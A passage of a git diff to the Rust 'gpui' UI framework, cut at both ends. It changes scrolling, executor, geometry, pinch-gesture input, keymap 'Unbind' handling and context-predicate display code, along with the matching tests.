dragging the scrollbar should + /// fully disengage follow_tail — clearing any suspended state so + /// follow_tail won’t auto-re-engage. + #[gpui::test] + fn test_follow_tail_suspended_state_cleared_by_explicit_actions(cx: &mut TestAppContext) { + let cx = cx.add_empty_window(); + + // 10 items × 50px = 500px total, 200px viewport. + let state = ListState::new(10, crate::ListAlignment::Top, px(0.)).measure_all(); + + struct TestView(ListState); + impl Render for TestView { + fn render(&mut self, _: &mut Window, _: &mut Context) -> impl IntoElement { + list(self.0.clone(), |_, _, _| { + div().h(px(50.)).w_full().into_any() + }) + .w_full() + .h_full() + } + } + + let view = cx.update(|_, cx| cx.new(|_| TestView(state.clone()))); + + state.set_follow_mode(FollowMode::Tail); + // --- Part 1: set_follow_mode(FollowState::Normal) clears suspended state --- + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // Scroll up — suspends follow_tail. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(50.))), + ..Default::default() + }); + assert!(!state.is_following_tail()); + + // Scroll back to the bottom — should re-engage follow_tail. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + state.is_following_tail(), + "follow_tail should re-engage after scrolling back to the bottom" + ); + + // --- Part 2: scrollbar drag clears suspended state --- + + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + + // Drag the scrollbar to the middle — should clear suspended state. + state.set_offset_from_scrollbar(point(px(0.), px(150.))); + + // Scroll to the bottom. + cx.simulate_event(ScrollWheelEvent { + position: point(px(50.), px(100.)), + delta: ScrollDelta::Pixels(point(px(0.), px(-10000.))), + ..Default::default() + }); + + // Paint — should NOT re-engage because the scrollbar drag + // cleared the suspended state. + cx.draw(point(px(0.), px(0.)), size(px(100.), px(200.)), |_, _| { + view.clone().into_any_element() + }); + assert!( + !state.is_following_tail(), + "follow_tail should not re-engage after scrollbar drag cleared the suspended state" + ); + } } diff --git a/crates/gpui/src/elements/svg.rs b/crates/gpui/src/elements/svg.rs index dff389fb93fe7abd2862be70731cc9e6fb613e94..a29b106c0e223b01340ecab27b45fdb94163d207 100644 --- a/crates/gpui/src/elements/svg.rs +++ b/crates/gpui/src/elements/svg.rs @@ -3,8 +3,7 @@ use std::{fs, path::Path, sync::Arc}; use crate::{ App, Asset, Bounds, Element, GlobalElementId, Hitbox, InspectorElementId, InteractiveElement, Interactivity, IntoElement, LayoutId, Pixels, Point, Radians, SharedString, Size, - StyleRefinement, Styled, TransformationMatrix, Window, geometry::Negate as _, point, px, - radians, size, + StyleRefinement, Styled, TransformationMatrix, Window, point, px, radians, size, }; use gpui_util::ResultExt; @@ -254,7 +253,7 @@ impl Transformation { .translate(center.scale(scale_factor) + self.translate.scale(scale_factor)) .rotate(self.rotate) .scale(self.scale) - .translate(center.scale(scale_factor).negate()) + .translate(center.scale(-scale_factor)) } } diff --git a/crates/gpui/src/elements/text.rs b/crates/gpui/src/elements/text.rs index ded0f596dcea2f6c992961906503adb6829e885f..49036abfec1cb3145ce72d2aabe7683e308f1ed0 100644 --- a/crates/gpui/src/elements/text.rs +++ b/crates/gpui/src/elements/text.rs @@ -246,7 +246,12 @@ impl StyledText { pub fn with_runs(mut self, runs: Vec) -> Self { let mut text = &**self.text; for run in &runs { - text = text.get(run.len..).expect("invalid text run"); + text = text.get(run.len..).unwrap_or_else(|| { + #[cfg(debug_assertions)] + panic!("invalid text run. Text: '{text}', run: {run:?}"); + #[cfg(not(debug_assertions))] + panic!("invalid text run"); + }); } assert!(text.is_empty(), "invalid text run"); self.runs = Some(runs); diff --git a/crates/gpui/src/executor.rs b/crates/gpui/src/executor.rs index 31c1ed80b92efb5dfa9ead6dcaf9050fe68ea399..f66f58447879afb86b721a9d6d7d2c59c65a8953 100644 --- a/crates/gpui/src/executor.rs +++ b/crates/gpui/src/executor.rs @@ -129,9 +129,11 @@ impl BackgroundExecutor { } } - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.inner.close(); + /// Returns the underlying scheduler::BackgroundExecutor. + /// + /// This is used by Ex to pass the executor to thread/worktree code. + pub fn scheduler_executor(&self) -> scheduler::BackgroundExecutor { + self.inner.clone() } /// Enqueues the given future to be run to completion on a background thread. @@ -173,7 +175,6 @@ impl BackgroundExecutor { { use crate::RunnableMeta; use parking_lot::{Condvar, Mutex}; - use std::sync::{Arc, atomic::AtomicBool}; struct NotifyOnDrop<'a>(&'a (Condvar, Mutex)); @@ -197,14 +198,13 @@ impl BackgroundExecutor { let dispatcher = self.dispatcher.clone(); let location = core::panic::Location::caller(); - let closed = Arc::new(AtomicBool::new(false)); let pair = &(Condvar::new(), Mutex::new(false)); let _wait_guard = WaitOnDrop(pair); let (runnable, task) = unsafe { async_task::Builder::new() - .metadata(RunnableMeta { location, closed }) + .metadata(RunnableMeta { location }) .spawn_unchecked( move |_| async { let _notify_guard = NotifyOnDrop(pair); @@ -404,11 +404,6 @@ impl ForegroundExecutor { } } - /// Close this executor. Tasks will not run after this is called. - pub fn close(&self) { - self.inner.close(); - } - /// Enqueues the given Task to run on the main thread. #[track_caller] pub fn spawn(&self, future: impl Future + 'static) -> Task @@ -595,144 +590,4 @@ mod test { "Task should run normally when app is alive" ); } - - #[test] - fn test_task_cancelled_when_app_dropped() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task_ran = Rc::new(RefCell::new(false)); - let task_ran_clone = Rc::clone(&task_ran); - - foreground_executor - .spawn(async move { - *task_ran_clone.borrow_mut() = true; - }) - .detach(); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - // The task should have been cancelled, not run - assert!( - !*task_ran.borrow(), - "Task should have been cancelled when app was dropped, but it ran!" - ); - } - - #[test] - fn test_nested_tasks_both_cancel() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let outer_completed = Rc::new(RefCell::new(false)); - let inner_completed = Rc::new(RefCell::new(false)); - let reached_await = Rc::new(RefCell::new(false)); - - let outer_flag = Rc::clone(&outer_completed); - let inner_flag = Rc::clone(&inner_completed); - let await_flag = Rc::clone(&reached_await); - - // Channel to block the inner task until we're ready - let (tx, rx) = futures::channel::oneshot::channel::<()>(); - - let inner_executor = foreground_executor.clone(); - - foreground_executor - .spawn(async move { - let inner_task = inner_executor.spawn({ - let inner_flag = Rc::clone(&inner_flag); - async move { - rx.await.ok(); - *inner_flag.borrow_mut() = true; - } - }); - - *await_flag.borrow_mut() = true; - - inner_task.await; - - *outer_flag.borrow_mut() = true; - }) - .detach(); - - // Run dispatcher until outer task reaches the await point - // The inner task will be blocked on the channel - dispatcher.run_until_parked(); - - // Verify we actually reached the await point before dropping the app - assert!( - *reached_await.borrow(), - "Outer task should have reached the await point" - ); - - // Neither task should have completed yet - assert!( - !*outer_completed.borrow(), - "Outer task should not have completed yet" - ); - assert!( - !*inner_completed.borrow(), - "Inner task should not have completed yet" - ); - - // Drop the channel sender and app while outer is awaiting inner - drop(tx); - drop(app); - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - // Run dispatcher - both tasks should be cancelled - dispatcher.run_until_parked(); - - // Neither task should have completed (both were cancelled) - assert!( - !*outer_completed.borrow(), - "Outer task should have been cancelled, not completed" - ); - assert!( - !*inner_completed.borrow(), - "Inner task should have been cancelled, not completed" - ); - } - - #[test] - #[should_panic] - fn test_polling_cancelled_task_panics() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task = foreground_executor.spawn(async move { 42 }); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - foreground_executor.block_on(task); - } - - #[test] - fn test_polling_cancelled_task_returns_none_with_fallible() { - let (dispatcher, _background_executor, app) = create_test_app(); - let foreground_executor = app.borrow().foreground_executor.clone(); - let app_weak = Rc::downgrade(&app); - - let task = foreground_executor.spawn(async move { 42 }).fallible(); - - drop(app); - - assert!(app_weak.upgrade().is_none(), "App should have been dropped"); - - dispatcher.run_until_parked(); - - let result = foreground_executor.block_on(task); - assert_eq!(result, None, "Cancelled task should return None"); - } } diff --git a/crates/gpui/src/geometry.rs b/crates/gpui/src/geometry.rs index 73fa9906267412c9f1c840d8403beeef4718119e..76157a06a587ac851d19f19fc5a4ed23c634bab5 100644 --- a/crates/gpui/src/geometry.rs +++ b/crates/gpui/src/geometry.rs @@ -78,6 +78,7 @@ pub trait Along { Deserialize, JsonSchema, Hash, + Neg, )] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] #[repr(C)] @@ -182,12 +183,6 @@ impl Along for Point { } } -impl Negate for Point { - fn negate(self) -> Self { - self.map(Negate::negate) - } -} - impl Point { /// Scales the point by a given factor, which is typically derived from the resolution /// of a target display to ensure proper sizing of UI elements. @@ -393,7 +388,9 @@ impl Display for Point { /// /// This struct is generic over the type `T`, which can be any type that implements `Clone`, `Default`, and `Debug`. /// It is commonly used to specify dimensions for elements in a UI, such as a window or element. -#[derive(Refineable, Default, Clone, Copy, PartialEq, Div, Hash, Serialize, Deserialize)] +#[derive( + Add, Clone, Copy, Default, Deserialize, Div, Hash, Neg, PartialEq, Refineable, Serialize, Sub, +)] #[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)] #[repr(C)] pub struct Size { @@ -598,34 +595,6 @@ where } } -impl Sub for Size -where - T: Sub + Clone + Debug + Default + PartialEq, -{ - type Output = Size; - - fn sub(self, rhs: Self) -> Self::Output { - Size { - width: self.width - rhs.width, - height: self.height - rhs.height, - } - } -} - -impl Add for Size -where - T: Add + Clone + Debug + Default + PartialEq, -{ - type Output = Size; - - fn add(self, rhs: Self) -> Self::Output { - Size { - width: self.width + rhs.width, - height: self.height + rhs.height, - } - } -} - impl Mul for Size where T: Mul + Clone + Debug + Default + PartialEq, @@ -1245,6 +1214,15 @@ where } } +impl From> for Point { + fn from(size: Size) -> Self { + Self { + x: size.width, + y: size.height, + } + } +} + impl Bounds where T: Add + Clone + Debug + Default + PartialEq, @@ -3754,48 +3732,6 @@ impl Half for Rems { } } -/// Provides a trait for types that can negate their values. -pub trait Negate { - /// Returns the negation of the given value - fn negate(self) -> Self; -} - -impl Negate for i32 { - fn negate(self) -> Self { - -self - } -} - -impl Negate for f32 { - fn negate(self) -> Self { - -self - } -} - -impl Negate for DevicePixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for ScaledPixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for Pixels { - fn negate(self) -> Self { - Self(-self.0) - } -} - -impl Negate for Rems { - fn negate(self) -> Self { - Self(-self.0) - } -} - /// A trait for checking if a value is zero. /// /// This trait provides a method to determine if a value is considered to be zero. diff --git a/crates/gpui/src/gpui.rs b/crates/gpui/src/gpui.rs index af3fb51ce51f7df570a8e28faad23018ed7dc778..6d7d801cd42c3639d7892295a660319d21b05dfa 100644 --- a/crates/gpui/src/gpui.rs +++ b/crates/gpui/src/gpui.rs @@ -1,5 +1,5 @@ #![doc = include_str!("../README.md")] -#![deny(missing_docs)] +#![warn(missing_docs)] #![allow(clippy::type_complexity)] // Not useful, GPUI makes heavy use of callbacks #![allow(clippy::collapsible_else_if)] // False positives in platform specific code #![allow(unused_mut)] // False positives in platform specific code @@ -54,6 +54,9 @@ mod util; mod view; mod window; +#[cfg(any(test, feature = "test-support"))] +pub use proptest; + #[cfg(doc)] pub mod _ownership_and_data_flow; @@ -86,7 +89,9 @@ pub use elements::*; pub use executor::*; pub use geometry::*; pub use global::*; -pub use gpui_macros::{AppContext, IntoElement, Render, VisualContext, register_action, test}; +pub use gpui_macros::{ + AppContext, IntoElement, Render, VisualContext, property_test, register_action, test, +}; pub use gpui_util::arc_cow::ArcCow; pub use http_client; pub use input::*; diff --git a/crates/gpui/src/input.rs b/crates/gpui/src/input.rs index c9c0a85cad2283c07af094e0f742c580341758ec..10ca46501d8a8206dee38e4e4a249931591ba631 100644 --- a/crates/gpui/src/input.rs +++ b/crates/gpui/src/input.rs @@ -187,4 +187,9 @@ impl InputHandler for ElementInputHandler { self.view .update(cx, |view, cx| view.accepts_text_input(window, cx)) } + + fn prefers_ime_for_printable_keys(&mut self, window: &mut Window, cx: &mut App) -> bool { + self.view + .update(cx, |view, cx| view.accepts_text_input(window, cx)) + } } diff --git a/crates/gpui/src/interactive.rs b/crates/gpui/src/interactive.rs index 5316a5992bb41d11ef5b6518555a9a20795f894c..0c7f2f9c97c59f90f8e037f069357dcc3c60c9cd 100644 --- a/crates/gpui/src/interactive.rs +++ b/crates/gpui/src/interactive.rs @@ -17,6 +17,9 @@ pub trait KeyEvent: InputEvent {} /// A mouse event from the platform. pub trait MouseEvent: InputEvent {} +/// A gesture event from the platform. +pub trait GestureEvent: InputEvent {} + /// The key down event equivalent for the platform. #[derive(Clone, Debug, Eq, PartialEq)] pub struct KeyDownEvent { @@ -467,6 +470,43 @@ impl Default for ScrollDelta { } } +/// A pinch gesture event from the platform, generated when the user performs +/// a pinch-to-zoom gesture (typically on a trackpad). +/// +#[derive(Clone, Debug, Default)] +pub struct PinchEvent { + /// The position of the pinch center on the window. + pub position: Point, + + /// The zoom delta for this event. + /// Positive values indicate zooming in, negative values indicate zooming out. + /// For example, 0.1 represents a 10% zoom increase. + pub delta: f32, + + /// The modifiers that were held down during the pinch gesture. + pub modifiers: Modifiers, + + /// The phase of the pinch gesture. + pub phase: TouchPhase, +} + +impl Sealed for PinchEvent {} +impl InputEvent for PinchEvent { + fn to_platform_input(self) -> PlatformInput { + PlatformInput::Pinch(self) + } +} +impl GestureEvent for PinchEvent {} +impl MouseEvent for PinchEvent {} + +impl Deref for PinchEvent { + type Target = Modifiers; + + fn deref(&self) -> &Self::Target { + &self.modifiers + } +} + impl ScrollDelta { /// Returns true if this is a precise scroll delta in pixels. pub fn precise(&self) -> bool { @@ -626,6 +666,8 @@ pub enum PlatformInput { MouseExited(MouseExitEvent), /// The scroll wheel was used. ScrollWheel(ScrollWheelEvent), + /// A pinch gesture was performed. + Pinch(PinchEvent), /// Files were dragged and dropped onto the window. FileDrop(FileDropEvent), } @@ -642,6 +684,7 @@ impl PlatformInput { PlatformInput::MousePressure(event) => Some(event), PlatformInput::MouseExited(event) => Some(event), PlatformInput::ScrollWheel(event) => Some(event), + PlatformInput::Pinch(event) => Some(event), PlatformInput::FileDrop(event) => Some(event), } } @@ -657,6 +700,7 @@ impl PlatformInput { PlatformInput::MousePressure(_) => None, PlatformInput::MouseExited(_) => None, PlatformInput::ScrollWheel(_) => None, + PlatformInput::Pinch(_) => None, PlatformInput::FileDrop(_) => None, } } diff --git a/crates/gpui/src/key_dispatch.rs b/crates/gpui/src/key_dispatch.rs index 03c7eaaaae6e16f8a9c3f486b0a7b863e0c86416..fee75d5dad39df5cb6c2df2729811a1d942d2fe8 100644 --- a/crates/gpui/src/key_dispatch.rs +++ b/crates/gpui/src/key_dispatch.rs @@ -629,66 +629,99 @@ mod tests { use std::{cell::RefCell, ops::Range, rc::Rc}; use crate::{ - Action, ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, - IntoElement, KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription, - TestAppContext, UTF16Selection, Window, + ActionRegistry, App, Bounds, Context, DispatchTree, FocusHandle, InputHandler, IntoElement, + KeyBinding, KeyContext, Keymap, Pixels, Point, Render, Subscription, TestAppContext, + UTF16Selection, Unbind, Window, }; - #[derive(PartialEq, Eq)] - struct TestAction; + actions!(dispatch_test, [TestAction, SecondaryTestAction]); - impl Action for TestAction { - fn name(&self) -> &'static str { - "test::TestAction" - } - - fn name_for_type() -> &'static str - where - Self: ::std::marker::Sized, - { - "test::TestAction" - } - - fn partial_eq(&self, action: &dyn Action) -> bool { - action.as_any().downcast_ref::() == Some(self) - } - - fn boxed_clone(&self) -> std::boxed::Box { - Box::new(TestAction) - } + fn test_dispatch_tree(bindings: Vec) -> DispatchTree { + let registry = ActionRegistry::default(); - fn build(_value: serde_json::Value) -> anyhow::Result> - where - Self: Sized, - { - Ok(Box::new(TestAction)) - } + DispatchTree::new( + Rc::new(RefCell::new(Keymap::new(bindings))), + Rc::new(registry), + ) } #[test] fn test_keybinding_for_action_bounds() { - let keymap = Keymap::new(vec![KeyBinding::new( + let tree = test_dispatch_tree(vec![KeyBinding::new( "cmd-n", TestAction, Some("ProjectPanel"), )]); - let mut registry = ActionRegistry::default(); + let contexts = vec![ + KeyContext::parse("Workspace").unwrap(), + KeyContext::parse("ProjectPanel").unwrap(), + ]; + + let keybinding = tree.bindings_for_action(&TestAction, &contexts); + + assert!(keybinding[0].action.partial_eq(&TestAction)) + } + + #[test] + fn test_bindings_for_action_hides_targeted_unbind_in_active_context() { + let tree = test_dispatch_tree(vec![ + KeyBinding::new("tab", TestAction, Some("Editor")), + KeyBinding::new( + "tab", + Unbind("dispatch_test::TestAction".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new( + "tab", + SecondaryTestAction, + Some("Editor && showing_completions"), + ), + ]); + + let contexts = vec![ + KeyContext::parse("Workspace").unwrap(), + KeyContext::parse("Editor showing_completions edit_prediction").unwrap(), + ]; - registry.load_action::(); + let bindings = tree.bindings_for_action(&TestAction, &contexts); + assert!(bindings.is_empty()); - let keymap = Rc::new(RefCell::new(keymap)); + let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts); + assert!(highest.is_none()); + + let fallback_bindings = tree.bindings_for_action(&SecondaryTestAction, &contexts); + assert_eq!(fallback_bindings.len(), 1); + assert!(fallback_bindings[0].action.partial_eq(&SecondaryTestAction)); + } - let tree = DispatchTree::new(keymap, Rc::new(registry)); + #[test] + fn test_bindings_for_action_keeps_targeted_binding_outside_unbind_context() { + let tree = test_dispatch_tree(vec![ + KeyBinding::new("tab", TestAction, Some("Editor")), + KeyBinding::new( + "tab", + Unbind("dispatch_test::TestAction".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new( + "tab", + SecondaryTestAction, + Some("Editor && showing_completions"), + ), + ]); let contexts = vec![ KeyContext::parse("Workspace").unwrap(), - KeyContext::parse("ProjectPanel").unwrap(), + KeyContext::parse("Editor").unwrap(), ]; - let keybinding = tree.bindings_for_action(&TestAction, &contexts); + let bindings = tree.bindings_for_action(&TestAction, &contexts); + assert_eq!(bindings.len(), 1); + assert!(bindings[0].action.partial_eq(&TestAction)); - assert!(keybinding[0].action.partial_eq(&TestAction)) + let highest = tree.highest_precedence_binding_for_action(&TestAction, &contexts); + assert!(highest.is_some_and(|binding| binding.action.partial_eq(&TestAction))); } #[test] @@ -698,10 +731,7 @@ mod tests { KeyBinding::new("space", TestAction, Some("ContextA")), KeyBinding::new("space f g", TestAction, Some("ContextB")), ]; - let keymap = Rc::new(RefCell::new(Keymap::new(bindings))); - let mut registry = ActionRegistry::default(); - registry.load_action::(); - let mut tree = DispatchTree::new(keymap, Rc::new(registry)); + let mut tree = test_dispatch_tree(bindings); type DispatchPath = SmallVec<[super::DispatchNodeId; 32]>; fn dispatch( diff --git a/crates/gpui/src/keymap.rs b/crates/gpui/src/keymap.rs index d5398ff0447849ca5bfcdbbb5a838af0cbc22836..eaf582a0074d4e8d21d46fdeadf44141182405a6 100644 --- a/crates/gpui/src/keymap.rs +++ b/crates/gpui/src/keymap.rs @@ -4,7 +4,7 @@ mod context; pub use binding::*; pub use context::*; -use crate::{Action, AsKeystroke, Keystroke, is_no_action}; +use crate::{Action, AsKeystroke, Keystroke, Unbind, is_no_action, is_unbind}; use collections::{HashMap, HashSet}; use smallvec::SmallVec; use std::any::TypeId; @@ -19,7 +19,7 @@ pub struct KeymapVersion(usize); pub struct Keymap { bindings: Vec, binding_indices_by_action_id: HashMap>, - no_action_binding_indices: Vec, + disabled_binding_indices: Vec, version: KeymapVersion, } @@ -27,6 +27,26 @@ pub struct Keymap { #[derive(Copy, Clone, Debug, Eq, PartialEq, Ord, PartialOrd)] pub struct BindingIndex(usize); +fn disabled_binding_matches_context(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool { + match ( + &disabled_binding.context_predicate, + &binding.context_predicate, + ) { + (None, _) => true, + (Some(_), None) => false, + (Some(disabled_predicate), Some(predicate)) => disabled_predicate.is_superset(predicate), + } +} + +fn binding_is_unbound(disabled_binding: &KeyBinding, binding: &KeyBinding) -> bool { + disabled_binding.keystrokes == binding.keystrokes + && disabled_binding + .action() + .as_any() + .downcast_ref::() + .is_some_and(|unbind| unbind.0.as_ref() == binding.action.name()) +} + impl Keymap { /// Create a new keymap with the given bindings. pub fn new(bindings: Vec) -> Self { @@ -44,8 +64,8 @@ impl Keymap { pub fn add_bindings>(&mut self, bindings: T) { for binding in bindings { let action_id = binding.action().as_any().type_id(); - if is_no_action(&*binding.action) { - self.no_action_binding_indices.push(self.bindings.len()); + if is_no_action(&*binding.action) || is_unbind(&*binding.action) { + self.disabled_binding_indices.push(self.bindings.len()); } else { self.binding_indices_by_action_id .entry(action_id) @@ -62,7 +82,7 @@ impl Keymap { pub fn clear(&mut self) { self.bindings.clear(); self.binding_indices_by_action_id.clear(); - self.no_action_binding_indices.clear(); + self.disabled_binding_indices.clear(); self.version.0 += 1; } @@ -90,21 +110,22 @@ impl Keymap { return None; } - for null_ix in &self.no_action_binding_indices { - if null_ix > ix { - let null_binding = &self.bindings[*null_ix]; - if null_binding.keystrokes == binding.keystrokes { - let null_binding_matches = - match (&null_binding.context_predicate, &binding.context_predicate) { - (None, _) => true, - (Some(_), None) => false, - (Some(null_predicate), Some(predicate)) => { - null_predicate.is_superset(predicate) - } - }; - if null_binding_matches { + for disabled_ix in &self.disabled_binding_indices { + if disabled_ix > ix { + let disabled_binding = &self.bindings[*disabled_ix]; + if disabled_binding.keystrokes != binding.keystrokes { + continue; + } + + if is_no_action(&*disabled_binding.action) { + if disabled_binding_matches_context(disabled_binding, binding) { return None; } + } else if is_unbind(&*disabled_binding.action) + && disabled_binding_matches_context(disabled_binding, binding) + && binding_is_unbound(disabled_binding, binding) + { + return None; } } } @@ -170,6 +191,7 @@ impl Keymap { let mut bindings: SmallVec<[_; 1]> = SmallVec::new(); let mut first_binding_index = None; + let mut unbound_bindings: Vec<&KeyBinding> = Vec::new(); for (_, ix, binding) in matched_bindings { if is_no_action(&*binding.action) { @@ -186,6 +208,19 @@ impl Keymap { // For non-user NoAction bindings, continue searching for user overrides continue; } + + if is_unbind(&*binding.action) { + unbound_bindings.push(binding); + continue; + } + + if unbound_bindings + .iter() + .any(|disabled_binding| binding_is_unbound(disabled_binding, binding)) + { + continue; + } + bindings.push(binding.clone()); first_binding_index.get_or_insert(ix); } @@ -197,7 +232,7 @@ impl Keymap { { continue; } - if is_no_action(&*binding.action) { + if is_no_action(&*binding.action) || is_unbind(&*binding.action) { pending.remove(&&binding.keystrokes); continue; } @@ -232,7 +267,10 @@ impl Keymap { match pending { None => None, Some(is_pending) => { - if !is_pending || is_no_action(&*binding.action) { + if !is_pending + || is_no_action(&*binding.action) + || is_unbind(&*binding.action) + { return None; } Some((depth, BindingIndex(ix), binding)) @@ -256,7 +294,7 @@ impl Keymap { mod tests { use super::*; use crate as gpui; - use gpui::NoAction; + use gpui::{NoAction, Unbind}; actions!( test_only, @@ -720,6 +758,76 @@ mod tests { } } + #[test] + fn test_targeted_unbind_ignores_target_context() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor")), + KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")), + KeyBinding::new( + "tab", + Unbind("test_only::ActionAlpha".into()), + Some("Editor && edit_prediction"), + ), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + let (result, pending) = keymap.bindings_for_input( + &[Keystroke::parse("tab").unwrap()], + &[KeyContext::parse("Editor showing_completions edit_prediction").unwrap()], + ); + + assert!(!pending); + assert_eq!(result.len(), 1); + assert!(result[0].action.partial_eq(&ActionBeta {})); + } + + #[test] + fn test_bindings_for_action_keeps_binding_for_narrower_targeted_unbind() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor")), + KeyBinding::new( + "tab", + Unbind("test_only::ActionAlpha".into()), + Some("Editor && edit_prediction"), + ), + KeyBinding::new("tab", ActionBeta {}, Some("Editor && showing_completions")), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + assert_bindings(&keymap, &ActionAlpha {}, &["tab"]); + assert_bindings(&keymap, &ActionBeta {}, &["tab"]); + + #[track_caller] + fn assert_bindings(keymap: &Keymap, action: &dyn Action, expected: &[&str]) { + let actual = keymap + .bindings_for_action(action) + .map(|binding| binding.keystrokes[0].inner().unparse()) + .collect::>(); + assert_eq!(actual, expected, "{:?}", action); + } + } + + #[test] + fn test_bindings_for_action_removes_binding_for_broader_targeted_unbind() { + let bindings = [ + KeyBinding::new("tab", ActionAlpha {}, Some("Editor && edit_prediction")), + KeyBinding::new( + "tab", + Unbind("test_only::ActionAlpha".into()), + Some("Editor"), + ), + ]; + + let mut keymap = Keymap::default(); + keymap.add_bindings(bindings); + + assert!(keymap.bindings_for_action(&ActionAlpha {}).next().is_none()); + } + #[test] fn test_source_precedence_sorting() { // KeybindSource precedence: User (0) > Vim (1) > Base (2) > Default (3) diff --git a/crates/gpui/src/keymap/context.rs b/crates/gpui/src/keymap/context.rs index f47ab307b6ba133bdfd40094322776f4c98a905c..27f361bbe28a812a2b8996433854504d26bfece7 100644 --- a/crates/gpui/src/keymap/context.rs +++ b/crates/gpui/src/keymap/context.rs @@ -199,13 +199,20 @@ pub enum KeyBindingContextPredicate { impl fmt::Display for KeyBindingContextPredicate { fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result { match self { - Self::Identifier(name) => write!(f, "{}", name), - Self::Equal(left, right) => write!(f, "{} == {}", left, right), - Self::NotEqual(left, right) => write!(f, "{} != {}", left, right), - Self::Not(pred) => write!(f, "!{}", pred), - Self::Descendant(parent, child) => write!(f, "{} > {}", parent, child), - Self::And(left, right) => write!(f, "({} && {})", left, right), - Self::Or(left, right) => write!(f, "({} || {})", left, right), + Self::Identifier(name) => write!(f, "{name}"), + Self::Equal(left, right) => write!(f, "{left} == {right}"), + Self::NotEqual(left, right) => write!(f, "{left} != {right}"), + Self::Descendant(parent, child) => write!(f, "{parent} > {child}"), + Self::Not(pred) => match pred.as_ref() { + Self::Identifier(name) => write!(f, "!{name}"), + _ => write!(f, "!({pred})"), + }, + Self::And(..) => self.fmt_joined(f, " && ", LogicalOperator::And, |node| { + matches!(node, Self::Or(..)) + }), + Self::Or(..) => self.fmt_joined(f, " || ", LogicalOperator::Or, |node| { + matches!(node, Self::And(..)) + }), } } } @@ -436,6 +443,52 @@ impl KeyBindingContextPredicate { anyhow::bail!("operands of != must be identifiers"); } } + + fn fmt_joined( + &self, + f: &mut fmt::Formatter<'_>, + separator: &str, + operator: LogicalOperator, + needs_parens: impl Fn(&Self) -> bool + Copy, + ) -> fmt::Result { + let mut first = true; + self.fmt_joined_inner(f, separator, operator, needs_parens, &mut first) + } + + fn fmt_joined_inner( + &self, + f: &mut fmt::Formatter<'_>, + separator: &str, + operator: LogicalOperator, + needs_parens: impl Fn(&Self) -> bool + Copy, + first: &mut bool, + ) -> fmt::Result { + match (operator, self) { + (LogicalOperator::And, Self::And(left, right)) + | (LogicalOperator::Or, Self::Or(left, right)) => { + left.fmt_joined_inner(f, separator, operator, needs_parens, first)?; + right.fmt_joined_inner(f, separator, operator, needs_parens, first) + } + (_, node) => { + if !*first { + f.write_str(separator)?; + } + *first = false; + + if needs_parens(node) { + write!(f, "({node})") + } else { + write!(f, "{node}") + } + } + } + } +} + +#[derive(Clone, Copy)] +enum LogicalOperator { + And, + Or, } const PRECEDENCE_CHILD: u32 = 1; @@ -757,4 +810,82 @@ mod tests { assert!(not_workspace.eval(slice::from_ref(&editor_context))); assert!(!not_workspace.eval(&workspace_pane_editor)); } + + // MARK: - Display + + #[test] + fn test_context_display() { + fn ident(s: &str) -> Box { + Box::new(Identifier(SharedString::new(s))) + } + fn eq(a: &str, b: &str) -> Box { + Box::new(Equal(SharedString::new(a), SharedString::new(b))) + } + fn not_eq(a: &str, b: &str) -> Box { + Box::new(NotEqual(SharedString::new(a), SharedString::new(b))) + } + fn and( + a: Box, + b: Box, + ) -> Box { + Box::new(And(a, b)) + } + fn or( + a: Box, + b: Box, + ) -> Box { + Box::new(Or(a, b)) + } + fn descendant( + a: Box, + b: Box, + ) -> Box { + Box::new(Descendant(a, b)) + } + fn not(a: Box) -> Box { + Box::new(Not(a)) + } + + let test_cases = [ + (ident("a"), "a"), + (eq("a", "b"), "a == b"), + (not_eq("a", "b"), "a != b"), + (descendant(ident("a"), ident("b")), "a > b"), + (not(ident("a")), "!a"), + (not_eq("a", "b"), "a != b"), + (descendant(ident("a"), ident("b")), "a > b"), + (not(and(ident("a"), ident("b"))), "!(a && b)"), + (not(or(ident("a"), ident("b"))), "!(a || b)"), + (and(ident("a"), ident("b")), "a && b"), + (and(and(ident("a"), ident("b")), ident("c")), "a && b && c"), + (or(ident("a"), ident("b")), "a || b"), + (or(or(ident("a"), ident("b")), ident("c")), "a || b || c"), + (or(ident("a"), and(ident("b"), ident("c"))), "a || (b && c)"), + ( + and( + and( + and(ident("a"), eq("b", 